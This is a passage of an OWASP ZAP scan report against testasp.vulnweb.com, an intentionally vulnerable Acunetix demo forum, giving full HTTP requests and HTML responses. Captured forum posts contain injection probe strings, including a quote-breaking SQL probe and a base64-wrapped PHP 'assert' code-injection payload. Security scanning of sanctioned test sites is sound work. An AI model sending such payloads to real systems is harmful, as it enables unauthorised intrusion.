applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 410 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3673 |
Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Search.asp |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmSearch" method="get" action=""> |
Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 2809 |
Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmSearch" method="get" action=""> |
Request Header - size: 478 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=YKSrENiG HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:01:11 GMT Content-Length: 2976 |
Response Body - size: 2,976 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DYKSrENiG" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'YKSrENiG'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmSearch" method="get" action=""> |
Request Header - size: 340 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 2961 |
Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=0 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4125 |
Response Body - size: 4,125 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4164 |
Response Body - size: 4,164 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 12345'"\'\");|]* </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/12345'"\'\");|]* </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>12345'"\'\");|]* - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4174 |
Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" 